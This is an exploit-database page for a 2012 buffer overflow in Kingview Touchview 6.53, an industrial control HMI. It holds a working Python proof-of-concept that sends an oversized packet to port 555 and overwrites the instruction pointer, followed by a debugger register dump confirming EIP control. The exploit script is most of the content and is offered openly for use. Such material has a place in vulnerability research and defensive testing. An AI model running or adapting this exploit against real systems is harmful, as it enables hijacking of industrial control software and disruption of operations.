header-logo
Suggest Exploit
vendor:
Kingview
by:
Carlos Mario Penagos Hollmann
7,8
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Kingview
Affected Version From: 6.53
Affected Version To: 6.53
Patch Exists: Yes
Related CWE: N/A
CPE: a:kingview:kingview
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows SP 1
2012

Kingview Touchview EIP direct control

Kingview Touchview is vulnerable to a buffer overflow attack when a malicious user sends a specially crafted packet to the vulnerable application. This packet contains a large amount of data which is then stored in a buffer, overwriting the adjacent memory. This can lead to arbitrary code execution.

Mitigation:

The vendor silently patched the vulnerability.
Source

Exploit-DB raw data:

# Exploit Title: Kingview Touchview  EIP direct control
# Date: June 24 2012
# Exploit Author: Carlos Mario Penagos Hollmann
# Vendor Homepage: www.kingview.com

# Version: 6.53
# Tested on: Windows SP 1
# CVE :

Open kingivew click on Make choose network configuration--->network
parameter , then  go to the node type and choose Local is a Login Server,
run the demo port 555 will be open.
NOTE:
This was already patched by the vendor silently.

import os
import socket
import sys

host ="10.0.2.15"
port = 555

exploit = ("\x90"*1024)
exploit += ("A"*23976)
exploit += ("B"*12500)
exploit += ("D"*6250)
exploit += ("E"*6002)
exploit += ("\x44\x43\x42\x41")
exploit += ("\x90"*256)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
s.send(exploit)
data = s.recv(1024)
print "  [+] Closing connection.."
s.close()
print "  [+] Done!"


eax=7ffdf000 ebx=00000000 ecx=40000000 edx=00000008 esi=41424344
edi=0012f6b4
eip=41424344 esp=0012f650 ebp=0012f678 iopl=0         nv up ei pl nz na po
nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000
efl=00010202
41424344 ??
CALL TO STACK
0x41424344
USER32!GetDC+0x6d
USER32!EnumDisplaySettingsA+0x27d
USER32!EnumDisplaySettingsA+0xc9
USER32!DefDlgProcA+0x22

Navigation

Suggest Exploit

Services By CQR